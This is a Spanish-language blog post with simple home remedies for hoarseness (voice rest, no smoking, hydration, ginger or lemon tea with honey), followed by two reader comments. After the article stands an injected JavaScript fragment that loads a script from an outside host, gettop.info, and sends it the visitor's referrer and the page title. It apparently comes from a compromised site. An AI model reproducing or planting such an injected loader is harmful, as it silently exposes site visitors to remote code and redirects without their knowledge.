Salud y belleza » Dolores, Salud

Consejos para curar la afonía

2 Comentarios

afoniaEntre tanto cambio de temperatura, tantas fiestas, salidas, vestidos cortos y demás seguro que más de uno y más de una se ha resfriado y se ha quedado sin voz este año. Si es tu caso no tienes de qué preocuparte porque vamos a darte una serie de consejos para que sepas cómo curar la afonía.

-  No forzar las cuerdas vocales: para recuperarte rápidamente debes hablar únicamente cuando sea necesario y de forma muy suave.

- No fumar: por supuesto deberás dejar de fumar porque el cigarrillo puede irritar tu laringe y hacer que la afonía dure mucho más.

- Hidratación: es importante beber mucho, sobre todo agua y jugos y evitar aquellas bebidas que son deshidratantes como el café o el alcohol.

- Bebe té: el té de jengibre, el de limón y algunas otras variedades de té son muy buenas para calmar la irritación de garganta. Para conseguir un efecto mayor échale unas gotitas de miel y seguro que en pocos días te recuperas.

¿Conoces más trucos para curar la afonía?

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; d.getElementsByTagName('head')[0].appendChild(s);

Más consejos de salud y belleza : , , ,

2 Comments »

  • alicia said:

    el té con limón y miel, de toda la vida, lo mejor para aliviar la afonía y el dolor de garganta.

  • pili said:

    estupendos consejos. escribo porque ahora estoy afónica y no puedo hablar, así que publico comentarios

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.